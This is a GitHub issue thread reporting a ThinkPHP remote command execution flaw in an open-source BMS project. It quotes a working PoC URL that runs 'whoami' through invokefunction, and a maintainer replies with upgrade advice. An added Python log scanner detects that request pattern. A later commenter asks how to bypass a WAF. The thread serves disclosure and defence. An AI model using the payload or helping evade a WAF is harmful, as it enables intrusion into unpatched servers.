open_source_bms

There is an RCE vulnerability in your system.

Open CCkiller opened this issue 6 years ago • 2 comments

The RCE (Remote Command Execution) vulnerability is triggered by an HTTP request. Successfully executed the command "whoami". PoC: http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

CCkiller avatar Jan 12 '19 03:01 CCkiller

This is the official vulnerability of ThinkPHP; please upgrade the core framework to the latest official version.

xyl-tools avatar Jan 14 '19 01:01 xyl-tools
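
A defensive check for the request shape quoted in the issue, as an added example that is not part of the original thread or of the project's code: it scans access-log lines for an `s=` route whose segments are not plain identifiers. The segment rule, the function names and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate module/controller/action segment is a plain
# identifier, optionally dotted (e.g. "index" or "v1.user").
SAFE_SEGMENT = re.compile(r"[A-Za-z]\w*(\.\w+)*")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2019:03:01:00 +0000] "GET /public/?s=index/index/index HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jan/2019:03:01:05 +0000] "GET /public//?s=index/\\think\\app/invokefunction'
    '&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 31',
    '198.51.100.7 - - [12/Jan/2019:03:01:09 +0000] "GET /public/?s=index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array HTTP/1.1" 403 0',
]

def fully_unquote(value, rounds=3):
    """Percent-decode until stable so the check runs on the canonical route."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_route(url):
    """Return a reason string if the s= route has a non-identifier segment, else None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for raw in query.get("s", []):
        route = fully_unquote(raw)
        for segment in (seg for seg in route.split("/") if seg):
            if not SAFE_SEGMENT.fullmatch(segment):
                return "route segment is not a plain name: " + segment
    return None

def scan(log_lines):
    """Return (client_ip, reason) for every log line with a suspicious route."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        reason = suspicious_route(match.group(1)) if match else None
        if reason:
            hits.append((line.split()[0], reason))
    return hits

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

A hit with a 200 response, like the second sample line, is worth triaging before one that was already rejected with 403.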

Hi, is there a way to bypass the WAF? I get a 403 Forbidden error.

velocity16902 avatar Jun 02 '20 16:06 velocity16902